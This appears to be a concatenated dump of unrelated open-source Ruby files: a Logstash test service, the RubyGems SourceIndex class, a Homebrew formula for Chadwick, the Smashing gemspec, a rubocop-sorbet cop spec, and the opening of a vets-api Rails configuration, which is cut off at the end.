require 'test_helper' class DeploymentTasksTest < Minitest::Test def setup load "test/fixtures/123_test_task.rb" ActiveRecord::Base.connection.execute("delete from #{::DeploymentTasks.database_table_name}") end def test_that_it_has_a_version_number refute_nil ::DeploymentTasks::VERSION end def test_that_run_works assert_equal [TestTask], ::DeploymentTasks.run! end def test_that_rollback_works assert ::DeploymentTasks.rollback! end def test_that_rollback_with_version_works assert ::DeploymentTasks.rollback!('12') end def test_that_rollback_then_run_works assert_equal [TestTask], ::DeploymentTasks.run! assert ::DeploymentTasks.rollback!('123') assert_equal [TestTask], ::DeploymentTasks.run! end end module DeploymentTasks class Runner private def file_require_path(filename) "test/fixtures/#{filename}" end end end
21.738095
97
0.751369
2600e6525b803b8a455e6c4dd2e89e956b29de54
8,893
# Licensed to Elasticsearch B.V. under one or more contributor # license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright # ownership. Elasticsearch B.V. licenses this file to you under # the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. require_relative "monitoring_api" require "childprocess" require "bundler" require "socket" require "tempfile" require 'yaml' # A locally started Logstash service class LogstashService < Service LS_ROOT_DIR = File.join("..", "..", "..", "..") LS_VERSION_FILE = File.expand_path(File.join(LS_ROOT_DIR, "versions.yml"), __FILE__) LS_BUILD_DIR = File.join(LS_ROOT_DIR, "build") LS_BIN = File.join("bin", "logstash") LS_CONFIG_FILE = File.join("config", "logstash.yml") SETTINGS_CLI_FLAG = "--path.settings" STDIN_CONFIG = "input {stdin {}} output { }" RETRY_ATTEMPTS = 60 TIMEOUT_MAXIMUM = 60 * 10 # 10mins. class ProcessStatus < Struct.new(:exit_code, :stderr_and_stdout); end @process = nil attr_reader :logstash_home attr_reader :default_settings_file attr_writer :env_variables def initialize(settings) super("logstash", settings) # if you need to point to a LS in different path if @settings.is_set?("ls_home_abs_path") @logstash_home = @settings.get("ls_home_abs_path") else # use the LS which was just built in source repo ls_version_file = YAML.load_file(LS_VERSION_FILE) ls_file = "logstash-" + ls_version_file["logstash"] # First try without the snapshot if it's there @logstash_home = File.expand_path(File.join(LS_BUILD_DIR, ls_file), __FILE__) @logstash_home += "-SNAPSHOT" unless Dir.exist?(@logstash_home) puts "Using #{@logstash_home} as LS_HOME" @logstash_bin = File.join("#{@logstash_home}", LS_BIN) raise "Logstash binary not found in path #{@logstash_home}" unless File.file? @logstash_bin end @default_settings_file = File.join(@logstash_home, LS_CONFIG_FILE) @monitoring_api = MonitoringAPI.new end def alive? if @process.nil? || @process.exited? raise "Logstash process is not up because of an error, or it stopped" else @process.alive? end end def exited? @process.exited? end def exit_code @process.exit_code end # Starts a LS process in background with a given config file # and shuts it down after input is completely processed def start_background(config_file) spawn_logstash("-e", config_file) end # Given an input this pipes it to LS. Expects a stdin input in LS def start_with_input(config, input) Bundler.with_unbundled_env do `cat #{Shellwords.escape(input)} | LS_JAVA_HOME=#{java.lang.System.getProperty('java.home')} #{Shellwords.escape(@logstash_bin)} -e \'#{config}\'` end end def start_background_with_config_settings(config, settings_file) spawn_logstash("-f", "#{config}", "--path.settings", settings_file) end def start_with_config_string(config) spawn_logstash("-e", "#{config} ") end # Can start LS in stdin and can send messages to stdin # Useful to test metrics and such def start_with_stdin puts "Starting Logstash #{@logstash_bin} -e #{STDIN_CONFIG}" Bundler.with_unbundled_env do out = Tempfile.new("duplex") out.sync = true @process = build_child_process("-e", STDIN_CONFIG) # pipe STDOUT and STDERR to a file @process.io.stdout = @process.io.stderr = out @process.duplex = true java_home = java.lang.System.getProperty('java.home') @process.environment['LS_JAVA_HOME'] = java_home @process.start wait_for_logstash puts "Logstash started with PID #{@process.pid}, LS_JAVA_HOME: #{java_home}" if alive? end end def write_to_stdin(input) if alive? @process.io.stdin.puts(input) end end # Spawn LS as a child process def spawn_logstash(*args) Bundler.with_unbundled_env do @process = build_child_process(*args) @env_variables.map { |k, v| @process.environment[k] = v} unless @env_variables.nil? java_home = java.lang.System.getProperty('java.home') @process.environment['LS_JAVA_HOME'] = java_home @process.io.inherit! @process.start puts "Logstash started with PID #{@process.pid}, LS_JAVA_HOME: #{java_home}" if @process.alive? end end def build_child_process(*args) feature_config_dir = @settings.feature_config_dir # if we are using a feature flag and special settings dir to enable it, use it # If some tests is explicitly using --path.settings, ignore doing this, because the tests # chose to overwrite it. if feature_config_dir && !args.include?(SETTINGS_CLI_FLAG) args << "--path.settings" args << feature_config_dir puts "Found feature flag. Starting LS using --path.settings #{feature_config_dir}" end puts "Starting Logstash: #{@logstash_bin} #{args}" ChildProcess.build(@logstash_bin, *args) end def teardown if [email protected]? # todo: put this in a sleep-wait loop to kill it force kill @process.io.stdin.close rescue nil @process.stop @process = nil end end # check if LS HTTP port is open def is_port_open? begin s = TCPSocket.open("localhost", 9600) s.close return true rescue Errno::ECONNREFUSED, Errno::EHOSTUNREACH return false end end def monitoring_api raise "Logstash is not up, but you asked for monitoring API" unless alive? @monitoring_api end # Wait until LS is started by repeatedly doing a socket connection to HTTP port def wait_for_logstash tries = RETRY_ATTEMPTS while tries > 0 if is_port_open? return else sleep 1 end tries -= 1 end raise "Logstash REST API did not come up after #{RETRY_ATTEMPTS}s." end # this method only overwrites existing config with new config # it does not assume that LS pipeline is fully reloaded after a # config change. It is up to the caller to validate that. def reload_config(initial_config_file, reload_config_file) FileUtils.cp(reload_config_file, initial_config_file) end def get_version `#{Shellwords.escape(@logstash_bin)} --version`.split("\n").last end def get_version_yml LS_VERSION_FILE end def process_id @process.pid end def application_settings_file feature_config_dir = @settings.feature_config_dir unless feature_config_dir @default_settings_file else File.join(feature_config_dir, "logstash.yml") end end def plugin_cli PluginCli.new(self) end def lock_file File.join(@logstash_home, "Gemfile.lock") end def run_cmd(cmd_args, change_dir = true, environment = {}) out = Tempfile.new("content") out.sync = true cmd, *args = cmd_args process = ChildProcess.build(cmd, *args) environment.each do |k, v| process.environment[k] = v end process.io.stdout = process.io.stderr = out Bundler.with_unbundled_env do if change_dir Dir.chdir(@logstash_home) do process.start end else process.start end end process.poll_for_exit(TIMEOUT_MAXIMUM) out.rewind ProcessStatus.new(process.exit_code, out.read) end def run(*args) run_cmd [ @logstash_bin, *args ] end class PluginCli LOGSTASH_PLUGIN = File.join("bin", "logstash-plugin") attr_reader :logstash_plugin def initialize(logstash_service) @logstash = logstash_service @logstash_plugin = File.join(@logstash.logstash_home, LOGSTASH_PLUGIN) end def remove(plugin_name) run("remove #{plugin_name}") end def prepare_offline_pack(plugins, output_zip = nil) plugins = Array(plugins) if output_zip.nil? run("prepare-offline-pack #{plugins.join(" ")}") else run("prepare-offline-pack --output #{output_zip} #{plugins.join(" ")}") end end def list(plugin_name, verbose = false) run("list #{plugin_name} #{verbose ? "--verbose" : ""}") end def install(plugin_name) run("install #{plugin_name}") end def run(command) run_raw("#{logstash_plugin} #{command}") end def run_raw(cmd, change_dir = true, environment = {}) @logstash.run_cmd(cmd.split(' '), change_dir, environment) end end end
28.873377
152
0.688856
b940b83cf872bd0b74cab7a4e75300af60c8c4fe
13,812
#-- # Copyright 2006 by Chad Fowler, Rich Kilmer, Jim Weirich and others. # All rights reserved. # See LICENSE.txt for permissions. #++ require 'rubygems' require 'rubygems/user_interaction' require 'rubygems/specification' require 'rubygems/spec_fetcher' ## # The SourceIndex object indexes all the gems available from a # particular source (e.g. a list of gem directories, or a remote # source). A SourceIndex maps a gem full name to a gem # specification. # # NOTE:: The class used to be named Cache, but that became # confusing when cached source fetchers where introduced. The # constant Gem::Cache is an alias for this class to allow old # YAMLized source index objects to load properly. class Gem::SourceIndex include Enumerable include Gem::UserInteraction attr_reader :gems # :nodoc: ## # Directories to use to refresh this SourceIndex when calling refresh! attr_accessor :spec_dirs class << self include Gem::UserInteraction ## # Factory method to construct a source index instance for a given # path. # # deprecated:: # If supplied, from_installed_gems will act just like # +from_gems_in+. This argument is deprecated and is provided # just for backwards compatibility, and should not generally # be used. # # return:: # SourceIndex instance def from_installed_gems(*deprecated) if deprecated.empty? from_gems_in(*installed_spec_directories) else from_gems_in(*deprecated) # HACK warn end end ## # Returns a list of directories from Gem.path that contain specifications. def installed_spec_directories Gem.path.collect { |dir| File.join(dir, "specifications") } end ## # Creates a new SourceIndex from the ruby format gem specifications in # +spec_dirs+. def from_gems_in(*spec_dirs) source_index = new source_index.spec_dirs = spec_dirs source_index.refresh! end ## # Loads a ruby-format specification from +file_name+ and returns the # loaded spec. def load_specification(file_name) begin spec_code = File.read(file_name).untaint gemspec = eval spec_code, binding, file_name if gemspec.is_a?(Gem::Specification) gemspec.loaded_from = file_name return gemspec end alert_warning "File '#{file_name}' does not evaluate to a gem specification" rescue SignalException, SystemExit raise rescue SyntaxError => e alert_warning e alert_warning spec_code rescue Exception => e alert_warning(e.inspect.to_s + "\n" + spec_code) alert_warning "Invalid .gemspec format in '#{file_name}'" end return nil end end ## # Constructs a source index instance from the provided # specifications # # specifications:: # [Hash] hash of [Gem name, Gem::Specification] pairs def initialize(specifications={}) @gems = specifications @spec_dirs = nil end ## # Reconstruct the source index from the specifications in +spec_dirs+. def load_gems_in(*spec_dirs) @gems.clear spec_dirs.reverse_each do |spec_dir| spec_files = Dir.glob File.join(spec_dir, '*.gemspec') spec_files.each do |spec_file| gemspec = self.class.load_specification spec_file.untaint add_spec gemspec if gemspec end end self end ## # Returns an Array specifications for the latest versions of each gem in # this index. def latest_specs result = Hash.new { |h,k| h[k] = [] } latest = {} sort.each do |_, spec| name = spec.name curr_ver = spec.version prev_ver = latest.key?(name) ? latest[name].version : nil next unless prev_ver.nil? or curr_ver >= prev_ver or latest[name].platform != Gem::Platform::RUBY if prev_ver.nil? or (curr_ver > prev_ver and spec.platform == Gem::Platform::RUBY) then result[name].clear latest[name] = spec end if spec.platform != Gem::Platform::RUBY then result[name].delete_if do |result_spec| result_spec.platform == spec.platform end end result[name] << spec end result.values.flatten end ## # Add a gem specification to the source index. def add_spec(gem_spec) @gems[gem_spec.full_name] = gem_spec end ## # Add gem specifications to the source index. def add_specs(*gem_specs) gem_specs.each do |spec| add_spec spec end end ## # Remove a gem specification named +full_name+. def remove_spec(full_name) @gems.delete(full_name) end ## # Iterate over the specifications in the source index. def each(&block) # :yields: gem.full_name, gem @gems.each(&block) end ## # The gem specification given a full gem spec name. def specification(full_name) @gems[full_name] end ## # The signature for the source index. Changes in the signature indicate a # change in the index. def index_signature require 'rubygems/digest/sha2' Gem::SHA256.new.hexdigest(@gems.keys.sort.join(',')).to_s end ## # The signature for the given gem specification. def gem_signature(gem_full_name) require 'rubygems/digest/sha2' Gem::SHA256.new.hexdigest(@gems[gem_full_name].to_yaml).to_s end def size @gems.size end alias length size ## # Find a gem by an exact match on the short name. def find_name(gem_name, version_requirement = Gem::Requirement.default) search(/^#{gem_name}$/, version_requirement) end ## # Search for a gem by Gem::Dependency +gem_pattern+. If +only_platform+ # is true, only gems matching Gem::Platform.local will be returned. An # Array of matching Gem::Specification objects is returned. # # For backwards compatibility, a String or Regexp pattern may be passed as # +gem_pattern+, and a Gem::Requirement for +platform_only+. This # behavior is deprecated and will be removed. def search(gem_pattern, platform_only = false) version_requirement = nil only_platform = false case gem_pattern # TODO warn after 2008/03, remove three months after when Regexp then version_requirement = platform_only || Gem::Requirement.default when Gem::Dependency then only_platform = platform_only version_requirement = gem_pattern.version_requirements gem_pattern = if Regexp === gem_pattern.name then gem_pattern.name elsif gem_pattern.name.empty? then // else /^#{Regexp.escape gem_pattern.name}$/ end else version_requirement = platform_only || Gem::Requirement.default gem_pattern = /#{gem_pattern}/i end unless Gem::Requirement === version_requirement then version_requirement = Gem::Requirement.create version_requirement end specs = @gems.values.select do |spec| spec.name =~ gem_pattern and version_requirement.satisfied_by? spec.version end if only_platform then specs = specs.select do |spec| Gem::Platform.match spec.platform end end specs.sort_by { |s| s.sort_obj } end ## # Replaces the gems in the source index from specifications in the # directories this source index was created from. Raises an exception if # this source index wasn't created from a directory (via from_gems_in or # from_installed_gems, or having spec_dirs set). def refresh! raise 'source index not created from disk' if @spec_dirs.nil? load_gems_in(*@spec_dirs) end ## # Returns an Array of Gem::Specifications that are not up to date. def outdated outdateds = [] latest_specs.each do |local| name = local.name dependency = Gem::Dependency.new name, ">= #{local.version}" begin fetcher = Gem::SpecFetcher.fetcher remotes = fetcher.find_matching dependency remotes = remotes.map { |(name, version,),| version } rescue Gem::RemoteFetcher::FetchError => e raise unless fetcher.warn_legacy e do require 'rubygems/source_info_cache' specs = Gem::SourceInfoCache.search_with_source dependency, true remotes = specs.map { |spec,| spec.version } end end latest = remotes.sort.last outdateds << name if latest and local.version < latest end outdateds end ## # Updates this SourceIndex from +source_uri+. If +all+ is false, only the # latest gems are fetched. def update(source_uri, all) source_uri = URI.parse source_uri unless URI::Generic === source_uri source_uri.path += '/' unless source_uri.path =~ /\/$/ use_incremental = false begin gem_names = fetch_quick_index source_uri, all remove_extra gem_names missing_gems = find_missing gem_names return false if missing_gems.size.zero? say "Missing metadata for #{missing_gems.size} gems" if missing_gems.size > 0 and Gem.configuration.really_verbose use_incremental = missing_gems.size <= Gem.configuration.bulk_threshold rescue Gem::OperationNotSupportedError => ex alert_error "Falling back to bulk fetch: #{ex.message}" if Gem.configuration.really_verbose use_incremental = false end if use_incremental then update_with_missing(source_uri, missing_gems) else new_index = fetch_bulk_index(source_uri) @gems.replace(new_index.gems) end true end def ==(other) # :nodoc: self.class === other and @gems == other.gems end def dump Marshal.dump(self) end private def fetcher require 'rubygems/remote_fetcher' Gem::RemoteFetcher.fetcher end def fetch_index_from(source_uri) @fetch_error = nil indexes = %W[ Marshal.#{Gem.marshal_version}.Z Marshal.#{Gem.marshal_version} yaml.Z yaml ] indexes.each do |name| spec_data = nil index = source_uri + name begin spec_data = fetcher.fetch_path index spec_data = unzip(spec_data) if name =~ /\.Z$/ if name =~ /Marshal/ then return Marshal.load(spec_data) else return YAML.load(spec_data) end rescue => e if Gem.configuration.really_verbose then alert_error "Unable to fetch #{name}: #{e.message}" end @fetch_error = e end end nil end def fetch_bulk_index(source_uri) say "Bulk updating Gem source index for: #{source_uri}" if Gem.configuration.verbose index = fetch_index_from(source_uri) if index.nil? then raise Gem::RemoteSourceException, "Error fetching remote gem cache: #{@fetch_error}" end @fetch_error = nil index end ## # Get the quick index needed for incremental updates. def fetch_quick_index(source_uri, all) index = all ? 'index' : 'latest_index' zipped_index = fetcher.fetch_path source_uri + "quick/#{index}.rz" unzip(zipped_index).split("\n") rescue ::Exception => e unless all then say "Latest index not found, using quick index" if Gem.configuration.really_verbose fetch_quick_index source_uri, true else raise Gem::OperationNotSupportedError, "No quick index found: #{e.message}" end end ## # Make a list of full names for all the missing gemspecs. def find_missing(spec_names) unless defined? @originals then @originals = {} each do |full_name, spec| @originals[spec.original_name] = spec end end spec_names.find_all { |full_name| @originals[full_name].nil? } end def remove_extra(spec_names) dictionary = spec_names.inject({}) { |h, k| h[k] = true; h } each do |name, spec| remove_spec name unless dictionary.include? spec.original_name end end ## # Unzip the given string. def unzip(string) require 'zlib' Gem.inflate string end ## # Tries to fetch Marshal representation first, then YAML def fetch_single_spec(source_uri, spec_name) @fetch_error = nil begin marshal_uri = source_uri + "quick/Marshal.#{Gem.marshal_version}/#{spec_name}.gemspec.rz" zipped = fetcher.fetch_path marshal_uri return Marshal.load(unzip(zipped)) rescue => ex @fetch_error = ex if Gem.configuration.really_verbose then say "unable to fetch marshal gemspec #{marshal_uri}: #{ex.class} - #{ex}" end end begin yaml_uri = source_uri + "quick/#{spec_name}.gemspec.rz" zipped = fetcher.fetch_path yaml_uri return YAML.load(unzip(zipped)) rescue => ex @fetch_error = ex if Gem.configuration.really_verbose then say "unable to fetch YAML gemspec #{yaml_uri}: #{ex.class} - #{ex}" end end nil end ## # Update the cached source index with the missing names. def update_with_missing(source_uri, missing_names) progress = ui.progress_reporter(missing_names.size, "Updating metadata for #{missing_names.size} gems from #{source_uri}") missing_names.each do |spec_name| gemspec = fetch_single_spec(source_uri, spec_name) if gemspec.nil? then ui.say "Failed to download spec #{spec_name} from #{source_uri}:\n" \ "\t#{@fetch_error.message}" else add_spec gemspec progress.updated spec_name end @fetch_error = nil end progress.done progress.count end end module Gem # :stopdoc: # Cache is an alias for SourceIndex to allow older YAMLized source index # objects to load properly. Cache = SourceIndex # :starddoc: end
25.20438
95
0.65892
e989b700148d64e4c626bc5a9586e17c9927c9d4
7,002
class Chadwick < Formula desc "Tools for parsing Retrosheet MLB play-by-play files" homepage "https://chadwick.sourceforge.io" url "https://downloads.sourceforge.net/project/chadwick/chadwick-0.7/chadwick-0.7.2/chadwick-0.7.2.tar.gz" sha256 "f7b3af15281106e101e2ccc4cb182a3f15dbdc3327f2bcb045bfc486a8fda46e" license "GPL-2.0" bottle do cellar :any sha256 "693c6ee0980401936a83453bdbc398aeb0eb06ba9bb8e101046508b14edfdc98" => :catalina sha256 "a068fd25b1e8b3d6f9a56a8a1d4ac18a49f07f82450b1ab3f3766b86fb0a362a" => :mojave sha256 "427b5c0fca10b23b66c56bda3537080df2ba467edea59a9dfd2f0fba56f50f9b" => :high_sierra end def install system "./configure", "--prefix=#{prefix}", "--disable-debug", "--disable-dependency-tracking" system "make" system "make", "install" end test do date_d = 24 date_m = 10 date_y = 2000 date_m_d_y = "#{date_m}/#{date_d}/#{date_y}" # chadwick's standard output date_xml = "#{date_y}/#{date_m}/#{date_d}" # chadwick's xml output date_xml_slug = date_xml.delete "/" # game_id and attributes for the retrosheet "team file" attr = { game_id: "ATL#{date_xml_slug}0", home: "ATL", home_name: "Braves", home_city: "Atlanta", visitor: "NYN", visitor_name: "Mets", visitor_city: "New York" } # retrosheet "event file" name, chadwick's xml name?, our value attr_map_info = [ [:visteam, :visitor, attr[:visitor]], [:hometeam, :home, attr[:home]], [:site, :site, "ATL02"], [:date, :date, date_xml], [:number, nil, "0"], [:starttime, :start_time, "8:00PM"], [:daynight, :day_night, "night"], [:umphome, :umpire_hp, "barkl901"], [:umphp, :umpire_hp, "barkl901"], [:ump1b, :umpire_1b, "rippm901"], [:ump2b, :umpire_2b, "cedeg901"], [:ump3b, :umpire_3b, "danlk901"], [:temp, :temperature, "60"], [:winddir, :wind_direction, "ltor"], [:windspeed, :wind_speed, "8"], [:timeofgame, :time_of_game, "187"], [:attendance, :attendance, "8"] ] # expected (computed) score related data in chadwick's output exp_linescore = { away_runs: "1", away_hits: "1", away_errors: "0", home_runs: "0", home_hits: "3", home_errors: "0" } exp_ing_ln_score = { away: ["0", "0", "1"], home: ["0", "0", "0"] } exp_innings_cnt = exp_ing_ln_score.values[0].size exp_tmplayers_cnt = 9 # expected player count for each team evn_file = testpath/"#{attr[:home]}#{date_y}.EVN" # retrosheet "event file" evn_file.write "id,#{attr[:game_id]}\nversion,2\n" evn_file.open("a") do |f| # info,...,... attr_map_info.each { |a, _, v| f.puts ["info", a, v].join(",") } end evn_file.append_lines <<~EOS start,youne003,"Eric Young",0,1,7\nstart,murpd006,"Daniel Murphy",0,2,4 start,wrigd002,"David Wright",0,3,5\nstart,granc001,"Curtis Granderson",0,4,9 start,dudal001,"Lucas Duda",0,5,3\nstart,lagaj001,"Juan Lagares",0,6,8 start,darnt001,"Travis d'Arnaud",0,7,2\nstart,tejar001,"Ruben Tejada",0,8,6 start,colob001,"Bartolo Colon",0,9,1\nstart,heywj001,"Jason Heyward",1,1,9 start,uptob001,"B.J. Upton",1,2,8\nstart,freef001,"Freddie Freeman",1,3,3 start,johnc003,"Chris Johnson",1,4,5\nstart,uptoj001,"Justin Upton",1,5,7 start,uggld001,"Dan Uggla",1,6,4\nstart,gatte001,"Evan Gattis",1,7,2 start,simma001,"Andrelton Simmons",1,8,6\nstart,haraa001,"Aaron Harang",1,9,1 play,1,0,youne003,01,CX,S8/L\nplay,1,0,murpd006,22,C*BBS1FF1>FS,K play,1,0,wrigd002,00,>B,SB2\nplay,1,0,wrigd002,31,>B.FBBX,63/G play,1,0,granc001,11,*BCX,3/L\nplay,1,1,heywj001,22,BCFBC,K play,1,1,uptob001,02,SST,K\nplay,1,1,freef001,01,FX,D8/L play,1,1,johnc003,10,BX,9/F\nplay,2,0,dudal001,21,BBCX,2/P2F play,2,0,lagaj001,32,BBSBSS,K\nplay,2,0,darnt001,12,BFCX,9/F play,2,1,uptoj001,12,CCFBX,8/F\nplay,2,1,uggld001,32,TBFBBX,53/G play,2,1,gatte001,01,CX,S9/G\nplay,2,1,simma001,02,CCX,9/F play,3,0,tejar001,31,BBBCB,W\nplay,3,0,colob001,02,LLL,K/BF play,3,0,youne003,30,B1BBB,W.1-2\nplay,3,0,murpd006,01,CX,9/F.2-3 play,3,0,wrigd002,00,>C,SB2\nplay,3,0,wrigd002,22,>C.F*B*BB,WP.3-H;2-3 play,3,0,wrigd002,32,>C.F*B*BB.X,8/F\nplay,3,1,haraa001,02,CSS,K play,3,1,heywj001,31,BBBCX,7/F\nplay,3,1,uptob001,11,FBX,S7/G play,3,1,freef001,20,111BB1X,3/L EOS team_file = testpath/"TEAM#{date_y}" # retrosheet "team file" team_file.write <<~EOS #{attr[:home]},N,#{attr[:home_city]},#{attr[:home_name]} #{attr[:visitor]},N,#{attr[:visitor_city]},#{attr[:visitor_name]} EOS ros_file_h = testpath/"#{attr[:home]}#{date_y}.ROS" # retrosheet "roster" ros_file_h.write <<~EOS freef001,Freeman,Freddie,L,R,ATL,1B\ngatte001,Gattis,Evan,R,R,ATL,C haraa001,Harang,Aaron,R,R,ATL,P\nheywj001,Heyward,Jason,L,L,ATL,OF simma001,Simmons,Andrelton,R,R,ATL,SS\nuggld001,Uggla,Dan,R,R,ATL,2B uptob001,Upton,B.J.,R,R,ATL,OF\nuptoj001,Upton,Justin,R,R,ATL,OF johnc003,Johnson,Chris,R,R,ATL,3B EOS ros_file_v = testpath/"#{attr[:visitor]}#{date_y}.ROS" # retrosheet "roster" ros_file_v.write <<~EOS colob001,Colon,Bartolo,R,R,NYN,P\ndarnt001,d'Arnaud,Travis,R,R,NYN,C dudal001,Duda,Lucas,L,R,NYN,OF\ngranc001,Granderson,Curtis,L,R,NYN,RF lagaj001,Lagares,Juan,R,R,NYN,OF\nmurpd006,Murphy,Daniel,L,R,NYN,3B tejar001,Tejada,Ruben,R,R,NYN,SS\nwrigd002,Wright,David,R,R,NYN,3B youne003,Yong,Eric,B,R,NYN,OF EOS # check chadwick's standard output exec_str = "#{bin}/cwbox -X -q -i #{attr[:game_id]} -y #{date_y} #{evn_file}" out = shell_output(exec_str.sub("-X", "")) assert_match "Game of #{date_m_d_y} -- #{attr[:visitor_city]} at #{attr[:home_city]}", out # check chadwick's xml output out_xml = shell_output(exec_str) require "rexml/document" doc = REXML::Document.new(out_xml) assert root = doc.root # check the root attributes attr_map_info.each { |_, ch_at, v| assert v == root.attributes[ch_at.to_s] if ch_at } attr.each { |ch_at, v| assert v == root.attributes[ch_at.to_s] } # check the computed scores exp_linescore.each { |k, v| assert v == root.elements["linescore"].attributes[k.to_s] } assert root.elements.to_a("linescore/inning_line_score").size == exp_innings_cnt root.elements.to_a("linescore/inning_line_score").each_with_index do |ing_line_score, idx| exp_ing_ln_score.each do |k, values| assert ing_line_score.attributes[k.to_s] == values[idx.to_i] end end # check the player count and that their full names have been fetched from the roster files assert root.elements["players[@team='#{attr[:visitor]}']"].elements.size == exp_tmplayers_cnt assert root.elements["players[@team='#{attr[:home]}']"].elements.size == exp_tmplayers_cnt root.elements.each("players/player") do |e| assert (!e.attributes["fname"].empty? && !e.attributes["lname"].empty?) end end end
48.965035
108
0.665667
1c0a9b466d22ae4bef8a41816e5c49f2916640b9
2,440
# -*- encoding: utf-8 -*- Gem::Specification.new do |s| s.name = 'smashing' s.version = '1.3.1.pre' s.date = '2020-06-04' s.executables = %w(smashing) s.summary = "The wonderfully excellent dashboard framework." s.description = "A framework for pulling together an overview of data that is important to your team and displaying it easily on TVs around the office. You write a bit of ruby code to gather data from some services and let Smashing handle the rest - displaying that data in a wonderfully simple layout. Built for developers and hackers, Smashing is highly customizable while maintaining humble roots that make it approachable to beginners." s.author = "Daniel Beauchamp" s.homepage = 'http://smashing.github.io/smashing' s.license = "MIT" s.metadata = { "bug_tracker_uri" => "https://github.com/Smashing/smashing/issues", # "changelog_uri" => "https://github.com/Smashing/smashing/CHANGELOG.md", "documentation_uri" => "https://github.com/Smashing/smashing/wiki", "homepage_uri" => "https://smashing.github.io/", "mailing_list_uri" => "https://gitter.im/Smashing/Lobby", "source_code_uri" => "https://github.com/Smashing/smashing/", "wiki_uri" => "https://github.com/Smashing/smashing/wiki" } s.files = Dir['README.md', 'javascripts/**/*', 'templates/**/*','templates/**/.[a-z]*', 'lib/**/*'] s.add_dependency('coffee-script', '~> 2.4.1') s.add_dependency('execjs', '~> 2.7.0') if RUBY_VERSION < "2.4.0" s.add_dependency('sinatra', '= 2.0.4') else s.add_dependency('sinatra', '~> 2.0.0') end s.add_dependency('sinatra-contrib', '~> 2.0.0') s.add_dependency('thin') s.add_dependency('rufus-scheduler', '~> 3.6.0') s.add_dependency('thor', '~> 1.0.1') if RUBY_VERSION < "2.5.0" s.add_dependency('sprockets', '~> 3.7.1') s.add_dependency('sass', '~> 3.4.24') else s.add_dependency('sprockets', '~> 4.0') s.add_dependency('sassc', '~> 2.0') end s.add_dependency('rack', '~> 2.2.2') s.add_development_dependency('rake', '~> 12.3.3') s.add_development_dependency('haml', '~> 5.0.1') s.add_development_dependency('rack-test', '~> 0.6.3') s.add_development_dependency('minitest', '~> 5.10.2') s.add_development_dependency('mocha', '~> 1.2.1') s.add_development_dependency('fakeweb', '~> 1.3.0') s.add_development_dependency('simplecov', '~> 0.14.1') end
42.807018
442
0.65123
aca117522bb166580e83d6fcb6657f8f1b762883
2,234
# frozen_string_literal: true require 'spec_helper' require_relative '../../../../lib/rubocop/cop/sorbet/signatures/signature_build_order' RSpec.describe(RuboCop::Cop::Sorbet::SignatureBuildOrder, :config) do subject(:cop) { described_class.new(config) } describe('offenses') do it('allows the correct order') do expect_no_offenses(<<~RUBY) sig { abstract.params(x: Integer).returns(Integer) } sig { params(x: Integer).void } sig { abstract.void } sig { void.soft } sig { override.void.checked(false) } sig { overridable.void } RUBY end it('allows using multiline sigs') do expect_no_offenses(<<~RUBY) sig do abstract .params(x: Integer) .returns(Integer) end RUBY end it('enforces orders of builder calls') do message = 'Sig builders must be invoked in the following order: type_parameters, params, void.' expect_offense(<<~RUBY) sig { void.type_parameters(:U).params(x: T.type_parameter(:U)) } ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ #{message} RUBY end end describe('autocorrect') do it('autocorrects sigs in the correct order') do source = <<~RUBY sig { void.type_parameters(:U).params(x: T.type_parameter(:U)) } RUBY expect(autocorrect_source(source)) .to(eq(<<~RUBY)) sig { type_parameters(:U).params(x: T.type_parameter(:U)).void } RUBY end end describe('without the unparser gem') do it('catches the errors and suggests using Unparser for the correction') do original_unparser = Unparser Object.send(:remove_const, :Unparser) # What does "constant" even mean? message = 'Sig builders must be invoked in the following order: type_parameters, params, void. ' \ 'For autocorrection, add the `unparser` gem to your project.' expect_offense(<<~RUBY) sig { void.type_parameters(:U).params(x: T.type_parameter(:U)) } ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ #{message} RUBY ensure Object.const_set(:Unparser, original_unparser) end end end
29.786667
101
0.593107
e2328e1ae3c725275ae400a39640ae74ab884fb5
4,219
# frozen_string_literal: true require_relative 'boot' require 'rails' # Pick the frameworks you want: require 'active_model/railtie' # require "active_job/railtie" require 'active_record/railtie' require 'active_storage/engine' require 'action_controller/railtie' require 'action_mailer/railtie' # require "action_mailbox/engine" # require "action_text/engine" # require "action_view/railtie" # require "action_cable/engine" # require "sprockets/railtie" require_relative '../lib/http_method_not_allowed' require_relative '../lib/statsd_middleware' require 'rails/test_unit/railtie' # Require the gems listed in Gemfile, including any gems # you've limited to :test, :development, or :production. Bundler.require(*Rails.groups) require_relative '../lib/olive_branch_patch' module VetsAPI class Application < Rails::Application # Initialize configuration defaults for originally generated Rails version. config.load_defaults 6.1 # Configuration for the application, engines, and railties goes here. # # These settings can be overridden in specific environments using the files # in config/environments, which are processed later. # # config.time_zone = "Central Time (US & Canada)" # config.eager_load_paths << Rails.root.join("extras") # Only loads a smaller set of middleware suitable for API only apps. # Middleware like session, flash, cookies can be added back manually. # Skip views, helpers and assets when generating a new resource. config.api_only = true config.relative_url_root = Settings.relative_url_root # This prevents rails from escaping html like & in links when working with JSON config.active_support.escape_html_entities_in_json = false # CORS configuration; see also cors_preflight route config.middleware.insert_before 0, Rack::Cors, logger: (-> { Rails.logger }) do allow do regex = Regexp.new(Settings.web_origin_regex) origins { |source, _env| Settings.web_origin.split(',').include?(source) || source.match?(regex) } resource '*', headers: :any, methods: :any, credentials: true, expose: %w[ X-RateLimit-Limit X-RateLimit-Remaining X-RateLimit-Reset X-Session-Expiration X-CSRF-Token ] end end # combats the "Flipper::Middleware::Memoizer appears to be running twice" error # followed suggestions to disable memoize config config.flipper.memoize = false config.middleware.insert_before(0, HttpMethodNotAllowed) config.middleware.use OliveBranch::Middleware, inflection_header: 'X-Key-Inflection' config.middleware.use StatsdMiddleware config.middleware.use Rack::Attack config.middleware.use ActionDispatch::Cookies config.middleware.use Warden::Manager do |config| config.failure_app = proc do |_env| ['401', { 'Content-Type' => 'application/json' }, { error: 'Unauthorized', code: 401 }] end config.intercept_401 = false config.default_strategies 